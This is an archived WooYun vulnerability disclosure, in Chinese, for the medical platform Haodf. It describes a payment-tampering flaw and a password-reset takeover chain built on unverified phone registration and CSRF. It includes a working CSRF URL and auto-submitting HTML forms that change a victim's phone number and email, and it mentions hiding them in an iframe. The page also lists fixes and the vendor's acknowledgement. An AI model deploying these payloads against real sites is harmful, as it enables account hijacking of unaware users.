当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018228

漏洞标题:好大夫密码找回缺陷问题打包

相关厂商:好大夫在线

漏洞作者: 小胖胖要减肥

提交时间:2013-02-01 18:36

修复时间:2013-03-18 18:36

公开时间:2013-03-18 18:36

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-01: 细节已通知厂商并且等待厂商处理中
2013-02-01: 厂商已经确认,细节仅向厂商公开
2013-02-11: 细节向核心白帽子及相关领域专家公开
2013-02-21: 细节向普通白帽子公开
2013-03-03: 细节向实习白帽子公开
2013-03-18: 细节向公众公开

简要描述:

好大夫密码找回漏洞打包,各种漏洞综合利用来搞密码,各种设计缺陷,我觉得设计太奇葩了

详细说明:

思路比较混乱,先发个支付漏洞,礼物那里重置金额更改

hdf1.jpg


1 现在开始将密码漏洞,首先注册时不填邮箱,但填手机的,无需验证码,这个时候就会导致一个可以利用的问题,为什么说可以利用呢,我可以csrf诱骗很多人的手机号改为我的,然后我想怎么找回密码都可以,如图为13800138000的手机号用户,不知道能不能去改医生的账号

hdf2.jpg


2 修改邮箱和手机都是post,但解析的时候修改手机get也能够解析,也能够通过csrf进行更改手机号和邮箱
url能够直接更改的原因在于解析post没有控制只解析form而不解析url传参
csrf的话关键功能需要增加防护token
危害性在于哪里,用户点击url或者访问某网址但好大夫的cookies没有失效的话会自动更改注册的手机号和邮箱,由于设计缺陷找回密码不需要输入用户名,我根本不需要知道改了哪个用户的,系统自动回告诉我,医生的能改影响就很大了

漏洞证明:

手机号更改的url 放在网站上或发给别人就可以
http://passport.haodf.com/user/modifyMobileForPost?isReceiveReply=0&mobile=13917114824&submit=+%C8%B7+%B6%A8+
手机号的csrf文件

<html>
<body>
<form id="wrhoooo" name="wrhoooo" action="http://passport.haodf.com/user/modifyMobileForPost" method="post">
<input type="test" name="isReceiveReply" value="0" />
<input type="test" name="mobile" value="13917122834" />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>


更改邮箱的csrf

<html>
<body>
<form id="wrhoooo" name="wrhoooo" action="http://passport.haodf.com/user/modifypassword?doAction=modify
" method="post">
<input type="test" name="newemail" value="sadasd8281@163.com" />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>


我把http://passport.haodf.com/user/modifyMobileForPost?isReceiveReply=0&mobile=13917114424&submit=+%C8%B7+%B6%A8+
发给用户a

hdf3.jpg


我用该手机号找回密码,验证码会发送到我的手机

hdf4.jpg


我直接更改密码就可以
现在的话可以直接改很多人的
csrf代码只是让你们看到效果,要真的搞会做个iframe,那样用户根本不知道被改了邮箱和手机,但我通过找回密码可以知道改了谁的

修复方案:

1 用户注册时输入手机需要输入验证码才能注册
2 一个手机最好只能对应一个用户
3 解析post数据时使用request.form,不要也把querysting的解析
4 关键功能增加csrf防护的toekn
5 支付的地方都要进行数据防篡改签名校验
6 找回密码最好同时输入用户名邮箱和用户名手机号,确保用户信息安全
上班比较忙 没有系统的分析 希望重视 贵网站需要提高的地方很多

版权声明:转载请注明来源 小胖胖要减肥@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-02-01 19:00

厂商回复:

这个的确是问题,某些情况确实可能造成影响,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-02-20 22:21 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)

    @小胖胖要减肥 给你送什么礼物了?

  2. 2013-02-20 22:58 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @带馅儿馒头 你是哪个小号 直接qq问我吧